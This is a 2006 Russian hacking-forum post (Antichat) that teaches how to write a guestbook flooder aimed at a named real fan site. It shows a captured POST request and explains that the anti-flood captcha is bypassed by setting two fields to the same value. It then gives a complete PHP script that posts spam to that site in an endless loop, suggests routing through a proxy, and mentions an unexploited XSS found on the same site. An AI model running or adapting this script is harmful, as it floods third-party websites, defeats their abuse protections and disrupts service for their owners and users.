Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Пишем простейший флудер гостевой [php] |
11.08.2006, 13:15
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Пишем простейший флудер гостевой [php]
Нашел сайтец... http://peski.ru (ФК ЦСКА)
А вот она и Гостевая = http://www.peski.ru/gbook/
Есчо есть бажный Чат... Почти сразу нашел Активную XSS =) Но это совсем другая история... %)
В гостевой, чтобы оставлять сообщения нам нужно зарегистрироваться... Зарегестрировал себя я как lamer (А что нет?)...
В форме отправке сообщения используется метод POST, значит будем ловить пакет с помощью Naviscope (что это такое и где его взять думаю найдете). В двух словах же скажу, что это он отлавливает, все что нам приходит, и что мы отправляем браузеру... =)
Значит так отправляем им собщение типа " Привет друзья, отличный у вас сайт"... Или типа того, вообщем это не важно... Там, что инетересно есть исчо и антифлуд, типа введите число на картинке... Я уж думал, что это плохо, как оказалось нет =)))
Ввел число, нажал "Отправить". Бежим смотреть заголовки. Навископ выложил нам:
POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0
Referer: http://www.peski.ru/gbook/form.php3
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.peski.ru
Content-Length: 160
Pragma: no-cache
Cookie: peskibook[name]=lamer; peskibook[email]=%40; peskibook[city]=%CC%EE%F1%EA%E2%E0; peskibook[country]=%D0%EE%F1%F1%E8%FF; peskibook[url]=http%3A%2F%2F; peskibook[password]=lamer; last_name=lamer;
Tname=lamer&Tpassword=lamer&Temail=@&Turl=http%3A% 2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1% F1%E8%FF&Tcoments=Привет Друзья&Tnumber=1397&Tdigitcode=1397
Разбирать детально не будем, вот, что нам понадобиться:
POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0 - На какой скрипт и каким методом, мы будем отправлять
Referer: http://www.peski.ru/gbook/form.php3 - Реферер, откуда мы отправляем сообщение =)
Content-Type: application/x-www-form-urlencoded - Тип передоваемых данных
Host: www.peski.ru - собственно говоря и хост =)
Content-Length: 160 - Длинна передоваемых данных (в байтах)
Cookie: - Там же авторизация... =)
Tname=lamer&Tpassword=lamer&Temail=@&Turl=http%3A% 2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1% F1%E8%FF&Tcoments=Привет Друзья&Tnumber=1397&Tdigitcode=1397 - А вот это наши параметры... Все, что нужно нам для флудера =)
Из последней строки мы можем легко найти, где наше сообщение, имя изверя, пароль... Тут вот еще, что интересно: Tnumber и Tdigitcode... Это и есть их антифлуд?!
Тоесть мы просто ставим эти значения одинаковыми =)
Типерь пишем флудер... Я взял PHP лучше конечно будет перл, но пхп все больше знают, да и перл компилить не удобно =)
Не буду выводить по строчке и все объяснять выложи скрипт, а там разберемси:
PHP код:
<?php
set_time_limit(9999999); //Чтобы скрипт работал бесконечно, в некоторых по умолчанию он работает 30 секунд, потом дохнет...
$id = 1; //гостевая не дает нам писать одинакововые сообщения поэтому просто будет добавляться в сообщение ейе ид, что еще дает нам проследить, скока сообщений мы отправили =)
$m = "Hello World!"; //Наше сообщение , желательно (Зенит чемпион) =)
$login = "lamer"; //Логин
$pass = "lamer"; //Пароль
while(1) //Делаем бесконечный цикл
{
$param = "Tname=$login&Tpassword=$pass&Temail=@&Turl=http%3A%2F%2F&Tcity=%CC%EE%F1%EA%E2%E0&Tcountry=%D0%EE%F1%F1%E8%FF&Tcoments=$m($id)&Tnumber=1397&Tdigitcode=1397";
//Заголовки
$header="POST http://www.peski.ru/gbook/submitgb.php3 HTTP/1.0\r\n".
"Referer: http://www.peski.ru/gbook/form.php3\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Host: www.peski.ru\r\n".
"Content-Length: ".strlen($param)."\r\n". //Стрлен сразу передает длинну передоваемых парамтров...
"Cookie: peskibook[name]=$login; peskibook[email]=%40; peskibook[city]=%CC%EE%F1%EA%E2%E0; peskibook[country]=%D0%EE%F1%F1%E8%FF; peskibook[url]=http%3A%2F%2F; peskibook[password]=$pass; last_name=$login\r\n\r\n".
$param;
//Заголовки окончены
$sock=fsockopen("www.peski.ru",80); //Здесь можно еонектиться к прокику...
fputs($sock,$header); //Отправляем хосту наши заголовки
fclose($sock); //Закрываем хост
$id = $id + 1; //Увеличиваем наш ид на один...
}
?>
Скрипт написан для того, чтобы просто представить себе алгоритм флудеров... Ссылку указана для теста... Уверен Админы, скоро прикроют это =) |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид